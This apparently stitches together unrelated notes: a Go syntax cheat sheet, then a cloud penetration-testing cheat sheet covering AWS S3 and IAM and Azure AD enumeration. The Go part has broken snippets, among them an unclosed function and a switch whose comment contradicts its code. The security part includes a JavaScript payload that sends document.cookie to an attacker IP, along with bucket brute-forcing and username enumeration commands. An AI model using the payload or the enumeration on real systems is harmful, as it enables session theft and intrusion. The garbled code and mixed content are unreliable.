Hello World
A sample go program is show here.
package main
import "fmt"
func main() {
message := greetMe("world")
fmt.Println(message)
}
func greetMe(name string) string {
return "Hello, " + name + "!"
}
Run the program as below:
$ go run hello.go
Variables
Normal Declaration:
var msg string
msg = "Hello"
Shortcut:
msg := "Hello"
Constants
const Phi = 1.618
Strings
str := "Hello"
Multiline string
str := `Multiline
string`
Numbers
Typical types
num := 3 // int
num := 3. // float64
num := 3 + 4i // complex128
num := byte('a') // byte (alias for uint8)
Other Types
var u uint = 7 // uint (unsigned)
var p float32 = 22.7 // 32-bit float
Arrays
// var numbers [5]int
numbers := [...]int{0, 0, 0, 0, 0}
Pointers
func main () {
b := *getPointer()
fmt.Println("Value is", b)
func getPointer () (myPointer *int) {
a := 234
return &a
a := new(int)
*a = 234
Pointers point to a memory location of a variable. Go is fully garbage-collected.
Type Conversion
i := 2
f := float64(i)
u := uint(i)
Slice
slice := []int{2, 3, 4}
slice := []byte("Hello")
Condition
if day == "sunday" || day == "saturday" {
rest()
} else if day == "monday" && isTired() {
groan()
} else {
work()
}
if _, err := doThing(); err != nil {
fmt.Println("Uh oh")
Switch
switch day {
case "sunday":
// cases don't "fall through" by default!
fallthrough
case "saturday":
rest()
default:
work()
}
Loop
for count := 0; count <= 10; count++ {
fmt.Println("My counter is at", count)
}
entry := []string{"Jack","John","Jones"}
for i, val := range entry {
fmt.Printf("At position %d, the character %s is present\n", i, val)
n := 0
x := 42
for n != x {
n := guess()
}
IAM
Enumerate for valid users and rols in the AWS Account
S3 Buckets
Check for Writable S3 Buckets
- If you can upload, then you can show impact by changing JS to steal cookies and other things.
var xhr=new XMLHttpRequest(); xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true); xhr.send();
Check for Bucket Versioning
curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com //Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request
Brute Force Bucket Names (assuming patterns are found)
ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt
Odds and ends that sometimes help
Check for AWS Account Number
aws sts get-access-key-info --access-key <AKIA Key>
Recon and Enumeration
Get basic information about the domain
https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1
AAD Internals
Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>
Azure Subdomain Enumeration
#github https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v
Username Enumeration
Github: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt
Windows AD Enumeration
This is a sample command in a code block
python3 helloworld.py